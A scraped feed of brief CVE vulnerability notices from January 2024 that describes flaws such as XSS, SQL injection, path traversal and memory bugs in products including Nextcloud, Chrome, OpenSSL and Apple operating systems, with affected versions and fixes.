🚨 CVE-2024-23855A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxcodemodify.php, in multiple parameters. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-27 00:37:32 |
🚨 CVE-2023-43993An issue in smaregi_app_market mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-27 00:37:25 |
🚨 CVE-2023-43989An issue in mokumoku chohu mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-27 00:37:24 |
🚨 CVE-2023-43988An issue in nature fitness saijo mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 23:37:24 |
🚨 CVE-2023-45779In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-01-26 22:37:24 |
🚨 CVE-2023-45779In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the following links (which go live Jan 30th, 2024).🎖@cveNotify |
|
| 2024-01-26 21:07:32 |
🚨 CVE-2023-42888The issue was addressed with improved checks. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. Processing a maliciously crafted image may result in disclosure of process memory.🎖@cveNotify |
|
| 2024-01-26 21:07:26 |
🚨 CVE-2023-42887An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2. An app may be able to read arbitrary files.🎖@cveNotify |
|
| 2024-01-26 21:07:25 |
🚨 CVE-2024-22403Nextcloud server is a self hosted personal cloud system. In affected versions OAuth codes did not expire. When an attacker would get access to an authorization code they could authenticate at any time using the code. As of version 28.0.0 OAuth codes are invalidated after 10 minutes and will no longer be authenticated. To exploit this vulnerability an attacker would need to intercept an OAuth code from a user session. It is recommended that the Nextcloud Server is upgraded to 28.0.0. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-26 21:07:24 |
🚨 CVE-2024-22400Nextcloud User Saml is an app for authenticating Nextcloud users using SAML. In affected versions users can be given a link to the Nextcloud server and end up on a uncontrolled thirdparty server. It is recommended that the User Saml app is upgraded to version 5.1.5, 5.2.5, or 6.0.1. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-01-26 20:37:24 |
🚨 CVE-2024-22211FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-26 20:07:32 |
🚨 CVE-2023-6384The WP User Profile Avatar WordPress plugin before 1.0.1 does not properly check for authorisation, allowing authors to delete and update arbitrary avatar🎖@cveNotify |
|
| 2024-01-26 20:07:25 |
🚨 CVE-2001-0901Hypermail allows remote attackers to execute arbitrary commands on a server supporting SSI via an attachment with a .shtml extension, which is archived on the server and can then be executed by requesting the URL for the attachment.🎖@cveNotify |
|
| 2024-01-26 20:07:24 |
🚨 CVE-1999-0067phf CGI program allows remote command execution through shell metacharacters.🎖@cveNotify |
|
| 2024-01-26 19:37:32 |
🚨 CVE-2024-23680AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.🎖@cveNotify |
|
| 2024-01-26 19:37:26 |
🚨 CVE-2024-23679Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.🎖@cveNotify |
|
| 2024-01-26 19:37:25 |
🚨 CVE-2005-0253Directory traversal vulnerability in index.php for BibORB 1.3.2, and possibly earlier versions, allows remote attackers to delete arbitrary files via a Delete action and .. (dot dot) sequences in the database_name parameter.🎖@cveNotify |
|
| 2024-01-26 19:37:24 |
🚨 CVE-2004-2262ImageManager in e107 before 0.617 does not properly check the types of uploaded files, which allows remote attackers to execute arbitrary code by uploading a PHP file via the upload parameter to images.php.🎖@cveNotify |
|
| 2024-01-26 19:07:32 |
🚨 CVE-2005-3181The audit system in Linux kernel 2.6.6, and other versions before 2.6.13.4, when CONFIG_AUDITSYSCALL is enabled, uses an incorrect function to free names_cache memory, which prevents the memory from being tracked by AUDITSYSCALL code and leads to a memory leak that allows attackers to cause a denial of service (memory consumption).🎖@cveNotify |
|
| 2024-01-26 19:07:26 |
🚨 CVE-2005-0252SQL injection vulnerability in BibORB 1.3.2, and possibly earlier versions, allows remote attackers to execute arbitrary SQL commands via the (1) Username or (2) Password.🎖@cveNotify |
|
| 2024-01-26 19:07:25 |
🚨 CVE-2002-0574Memory leak in FreeBSD 4.5 and earlier allows remote attackers to cause a denial of service (memory exhaustion) via ICMP echo packets that trigger a bug in ip_output() in which the reference count for a routing table entry is not decremented, which prevents the entry from being removed.🎖@cveNotify |
|
| 2024-01-26 19:07:24 |
🚨 CVE-2001-0136Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.🎖@cveNotify |
|
| 2024-01-26 18:37:43 |
🚨 CVE-2024-23213The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-01-26 18:37:42 |
🚨 CVE-2024-23211A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user's private browsing activity may be visible in Settings.🎖@cveNotify |
|
| 2024-01-26 18:37:41 |
🚨 CVE-2024-23210This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user's phone number in system logs.🎖@cveNotify |
|
| 2024-01-26 18:37:37 |
🚨 CVE-2024-23207This issue was addressed with improved redaction of sensitive information. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-01-26 18:37:36 |
🚨 CVE-2024-0679The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.🎖@cveNotify |
|
| 2024-01-26 18:37:31 |
🚨 CVE-2024-23686DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.🎖@cveNotify |
|
| 2024-01-26 18:37:30 |
🚨 CVE-2024-22419Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data as we require it to be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in commit `55e18f6d1` which will be included in future releases. Users are advised to update when possible.🎖@cveNotify |
|
| 2024-01-26 18:07:43 |
🚨 CVE-2017-5697Insufficient clickjacking protection in the Web User Interface of Intel AMT firmware versions before 9.1.40.1000, 9.5.60.1952, 10.0.50.1004, 11.0.0.1205, and 11.6.25.1129 potentially allowing a remote attacker to hijack users web clicks via attacker's crafted web page.🎖@cveNotify |
|
| 2024-01-26 18:07:42 |
🚨 CVE-2017-7440Kerio Connect 8.0.0 through 9.2.2, and Kerio Connect Client desktop application for Windows and Mac 9.2.0 through 9.2.2, when e-mail preview is enabled, allows remote attackers to conduct clickjacking attacks via a crafted e-mail message.🎖@cveNotify |
|
| 2024-01-26 18:07:41 |
🚨 CVE-2010-0467Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.🎖@cveNotify |
|
| 2024-01-26 18:07:37 |
🚨 CVE-2010-0013Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon.🎖@cveNotify |
|
| 2024-01-26 18:07:36 |
🚨 CVE-2009-4449Directory traversal vulnerability in MyBB (aka MyBulletinBoard) 1.4.10, and possibly earlier versions, when changing the user avatar from the gallery, allows remote authenticated users to determine the existence of files via directory traversal sequences in the avatar and possibly the gallery parameters, related to (1) admin/modules/user/users.php and (2) usercp.php.🎖@cveNotify |
|
| 2024-01-26 18:07:32 |
🚨 CVE-2009-4194Directory traversal vulnerability in Golden FTP Server 4.30 Free and Professional, 4.50, and possibly other versions allows remote authenticated users to delete arbitrary files via a .. (dot dot) in the DELE command. NOTE: some of these details are obtained from third party information.🎖@cveNotify |
|
| 2024-01-26 18:07:31 |
🚨 CVE-2009-1936_functions.php in cpCommerce 1.2.x, possibly including 1.2.9, sends a redirect but does not exit when it is called directly, which allows remote attackers to bypass a protection mechanism to conduct remote file inclusion and directory traversal attacks, execute arbitrary PHP code, or read arbitrary files via the GLOBALS[prefix] parameter, a different vector than CVE-2003-1500.🎖@cveNotify |
|
| 2024-01-26 18:07:30 |
🚨 CVE-2009-0244Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder.🎖@cveNotify |
|
| 2024-01-26 18:07:26 |
🚨 CVE-2006-7079Variable extraction vulnerability in include/common.php in exV2 2.0.4.3 and earlier allows remote attackers to overwrite arbitrary program variables and conduct directory traversal attacks to execute arbitrary code by modifying the $xoopsOption['pagetype'] variable.🎖@cveNotify |
|
| 2024-01-26 18:07:25 |
🚨 CVE-2000-0497IBM WebSphere server 3.0.2 allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case.🎖@cveNotify |
|
| 2024-01-26 17:07:42 |
🚨 CVE-2022-21299Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-01-26 17:07:41 |
🚨 CVE-2022-21293Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-01-26 17:07:37 |
🚨 CVE-2020-28872An authorization bypass vulnerability in Monitorr v1.7.6m in Monitorr/assets/config/_installation/_register.php allows an unauthorized person to create valid credentials.🎖@cveNotify |
|
| 2024-01-26 17:07:36 |
🚨 CVE-2005-1879LutelWall 0.97 and earlier allows local users to overwrite arbitrary files via a symlink attack on a temporary file created by a system call to wget.🎖@cveNotify |
|
| 2024-01-26 17:07:32 |
🚨 CVE-2005-1111Race condition in cpio 2.6 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by cpio after the decompression is complete.🎖@cveNotify |
|
| 2024-01-26 17:07:31 |
🚨 CVE-2004-1603cPanel 9.4.1-RELEASE-64 follows hard links, which allows local users to (1) read arbitrary files via the backup feature or (2) chown arbitrary files via the .htaccess file when Front Page extensions are enabled or disabled.🎖@cveNotify |
|
| 2024-01-26 17:07:26 |
🚨 CVE-2000-1178Joe text editor follows symbolic links when creating a rescue copy called DEADJOE during an abnormal exit, which allows local users to overwrite the files of other users whose joe session crashes.🎖@cveNotify |
|
| 2024-01-26 17:07:25 |
🚨 CVE-1999-0783FreeBSD allows local users to conduct a denial of service by creating a hard link from a device special file to a file on an NFS file system.🎖@cveNotify |
|
| 2024-01-26 16:07:32 |
🚨 CVE-2024-0739A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-26 16:07:31 |
🚨 CVE-2023-6044A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges.🎖@cveNotify |
|
| 2024-01-26 16:07:26 |
🚨 CVE-2023-5081An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier.🎖@cveNotify |
|
| 2024-01-26 16:07:25 |
🚨 CVE-2023-22045Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u371, 8u371-perf, 11.0.19, 17.0.7, 20.0.1; Oracle GraalVM Enterprise Edition: 20.3.10, 21.3.6, 22.3.2; Oracle GraalVM for JDK: 17.0.7 and 20.0.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition, Oracle GraalVM for JDK accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-01-26 15:37:33 |
🚨 CVE-2024-0738A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-26 15:37:26 |
🚨 CVE-2024-23683Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.🎖@cveNotify |
|
| 2024-01-26 15:37:25 |
🚨 CVE-2023-40052This issue affects Progress Application Server (PAS) for OpenEdge in versions 11.7 prior to 11.7.18, 12.2 prior to 12.2.13, and innovation releases prior to 12.8.0. An attacker who can produce a malformed web request may cause the crash of a PASOE agent potentially disrupting the thread activities of many web application clients. Multiple of these DoS attacks could lead to the flooding of invalid requests as compared to the server’s remaining ability to process valid requests.🎖@cveNotify |
|
| 2024-01-26 15:37:24 |
🚨 CVE-2023-40051This issue affects Progress Application Server (PAS) for OpenEdge in versions 11.7 prior to 11.7.18, 12.2 prior to 12.2.13, and innovation releases prior to 12.8.0. An attacker can formulate a request for a WEB transport that allows unintended file uploads to a server directory path on the system running PASOE. If the upload contains a payload that can further exploit the server or its network, the launch of a larger scale attack may be possible.🎖@cveNotify |
|
| 2024-01-26 15:07:31 |
🚨 CVE-2024-0737A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.🎖@cveNotify |
|
| 2024-01-26 15:07:30 |
🚨 CVE-2024-22401Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users could change the allowed list of apps, allowing them to use apps that were not intended to be used. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-26 15:07:26 |
🚨 CVE-2024-22212Nextcloud Global Site Selector is a tool which allows you to run multiple small Nextcloud instances and redirect users to the right server. A problem in the password verification method allows an attacker to authenticate as another user. It is recommended that the Nextcloud Global Site Selector is upgraded to version 1.4.1, 2.1.2, 2.3.4 or 2.4.5. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-01-26 15:07:25 |
🚨 CVE-2023-31274AVEVA PI Server versions 2023 and 2018 SP3 P05 and prior contain a vulnerability that could allow an unauthenticated user to cause the PI Message Subsystem of a PI Server to consume available memory resulting in throttled processing of new PI Data Archive events and a partial denial-of-service condition.🎖@cveNotify |
|
| 2024-01-26 15:07:24 |
🚨 CVE-2023-28901The Skoda Automotive cloud contains a Broken Access Control vulnerability, allowing remote attackers to obtain recent trip data, vehicle mileage, fuel consumption, average and maximum speed, and other information of Skoda Connect service users by specifying an arbitrary vehicle VIN number.🎖@cveNotify |
|
| 2024-01-26 14:37:25 |
🚨 CVE-2024-0921A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139.🎖@cveNotify |
|
| 2024-01-26 14:37:24 |
🚨 CVE-2024-22402Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-01-26 14:07:32 |
🚨 CVE-2024-0890A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-26 14:07:31 |
🚨 CVE-2024-0732A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.🎖@cveNotify |
|
| 2024-01-26 14:07:26 |
🚨 CVE-2023-50693An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request.🎖@cveNotify |
|
| 2024-01-26 14:07:25 |
🚨 CVE-2024-0654A vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-26 13:37:24 |
🚨 CVE-2024-0696A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-26 11:37:32 |
🚨 CVE-2024-23896A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/stock.php, in the batchno parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 11:37:25 |
🚨 CVE-2024-23892A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/costcentercreate.php, in the costcenterid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 11:37:24 |
🚨 CVE-2024-23890A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itempopup.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 10:37:32 |
🚨 CVE-2024-23868A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/grnlist.php, in the deleted parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 10:37:26 |
🚨 CVE-2024-23867A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/statecreate.php, in the stateid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 10:37:25 |
🚨 CVE-2024-23864A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/countrylist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 10:37:24 |
🚨 CVE-2024-23863A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/taxstructuredisplay.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-26 09:37:32 |
🚨 CVE-2024-0918A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-26 09:37:26 |
🚨 CVE-2024-0727Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSLto crash leading to a potential Denial of Service attackImpact summary: Applications loading files in the PKCS12 format from untrustedsources might terminate abruptly.A file in PKCS12 format can contain certificates and keys and may come from anuntrusted source. The PKCS12 specification allows certain fields to be NULL, butOpenSSL does not correctly check for this case. This can lead to a NULL pointerdereference that results in OpenSSL crashing. If an application processes PKCS12files from an untrusted source using the OpenSSL APIs then that application willbe vulnerable to this issue.OpenSSL APIs that are vulnerable to this are: PKCS12_parse(),PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()and PKCS12_newpass().We have also fixed a similar issue in SMIME_write_PKCS7(). However since thisfunction is related to writing data we do not consider it security significant.The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.🎖@cveNotify |
|
| 2024-01-26 09:37:25 |
🚨 CVE-2021-33631Integer Overflow or Wraparound vulnerability in openEuler kernel on Linux (filesystem modules) allows Forced Integer Overflow.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3, from 5.10.0-60.18.0 before 5.10.0-183.0.0.🎖@cveNotify |
|
| 2024-01-26 09:37:24 |
🚨 CVE-2021-33630NULL Pointer Dereference vulnerability in openEuler kernel on Linux (network modules) allows Pointer Manipulation. This vulnerability is associated with program files net/sched/sch_cbs.C.This issue affects openEuler kernel: from 4.19.90 before 4.19.90-2401.3.🎖@cveNotify |
|
| 2024-01-26 08:37:25 |
🚨 CVE-2023-6919Path Traversal: '/../filedir' vulnerability in Biges Safe Life Technologies Electronics Inc. VGuard allows Absolute Path Traversal.This issue affects VGuard: before V500.0003.R008.4011.C0012.B351.C.🎖@cveNotify |
|
| 2024-01-26 08:37:24 |
🚨 CVE-2023-48129An issue in kimono-oldnew mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 07:37:31 |
🚨 CVE-2023-48135An issue in mimasaka_farm mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 07:37:30 |
🚨 CVE-2023-48132An issue in kosei entertainment esportsstudioLegends mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 07:37:26 |
🚨 CVE-2023-48130An issue in GINZA CAFE mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 07:37:25 |
🚨 CVE-2023-48127An issue in myGAKUYA mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 07:37:24 |
🚨 CVE-2023-48126An issue in Luxe Beauty Clinic mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-26 05:37:26 |
🚨 CVE-2023-38323An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.🎖@cveNotify |
|
| 2024-01-26 05:37:25 |
🚨 CVE-2023-38317An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands.🎖@cveNotify |
|
| 2024-01-26 05:37:24 |
🚨 CVE-2023-38324An issue was discovered in OpenNDS before 10.1.2. It allows users to skip the splash page sequence (and directly authenticate) when it is using the default FAS key and OpenNDS is configured as FAS.🎖@cveNotify |
|
| 2024-01-26 02:37:32 |
🚨 CVE-2024-0808Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-26 02:37:26 |
🚨 CVE-2024-0807Use after free in Web Audio in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-26 02:37:25 |
🚨 CVE-2024-0804Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-26 02:37:24 |
